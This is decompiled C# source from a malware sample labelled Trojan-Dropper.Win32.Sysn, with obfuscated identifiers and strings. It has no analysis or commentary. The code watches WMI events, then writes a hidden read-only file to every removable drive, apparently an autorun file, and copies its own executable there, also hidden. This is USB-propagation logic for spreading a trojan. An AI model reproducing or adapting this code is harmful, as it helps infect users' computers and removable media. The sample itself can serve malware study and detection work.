// Decompiled with JetBrains decompiler // Type: . // Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe using \u0001; using \u000F; using System; using System.Diagnostics; using System.IO; using System.Management; using System.Runtime.InteropServices; using System.Threading; namespace \u000F { internal sealed class \u0005 { [NonSerialized] internal static \u0002 \u0001; private static ManagementEventWatcher \u0001; public static void \u000F() { ManagementScope scope = new ManagementScope(\u0005.\u0001(8131)); scope.Options.EnablePrivileges = true; try { Thread.Sleep(50); \u0005.\u0001 = new ManagementEventWatcher(scope, (EventQuery) new WqlEventQuery() { EventClassName = \u0005.\u0001(8148), WithinInterval = new TimeSpan(0, 0, 3), Condition = \u0005.\u0001(8181) }); \u0005.\u0001.EventArrived += new EventArrivedEventHandler(\u0005.\u000F); \u0005.\u0001.Start(); } catch { if (\u0005.\u0001 == null) return; \u0005.\u0001.Stop(); } } public static void \u000F([In] object obj0, [In] EventArgs obj1) { foreach (DriveInfo drive in DriveInfo.GetDrives()) { if (drive.DriveType == DriveType.Removable) { try { Thread.Sleep(50); if (File.Exists(drive.Name + \u0005.\u0001(8246))) File.Delete(drive.Name + \u0005.\u0001(8246)); if (File.Exists(drive.Name + \u0005.\u0001(8263))) File.Delete(drive.Name + \u0005.\u0001(8263)); } catch { } StreamWriter streamWriter = new StreamWriter(drive.Name + \u0005.\u0001(8246)); streamWriter.WriteLine(\u0005.\u0001(8280)); streamWriter.WriteLine(\u0005.\u0001(8293)); streamWriter.WriteLine(\u0005.\u0001(8314)); streamWriter.WriteLine(\u0005.\u0001(8371)); streamWriter.WriteLine(\u0005.\u0001(8396)); streamWriter.WriteLine(\u0005.\u0001(8429)); streamWriter.Close(); Thread.Sleep(50); File.SetAttributes(drive.Name + \u0005.\u0001(8246), File.GetAttributes(drive.Name + \u0005.\u0001(8246)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly); try { File.Copy(Process.GetCurrentProcess().MainModule.FileName, drive.Name + \u0005.\u0001(8263)); File.SetAttributes(drive.Name + \u0005.\u0001(8263), File.GetAttributes(drive.Name + \u0005.\u0001(8263)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly); } finally { Thread.Sleep(2000); } } if (\u0005.\u0001 != null) \u0005.\u0001.Stop(); \u0005.\u0001.Start(); } } static \u0005() => \u0003.\u000F(); } }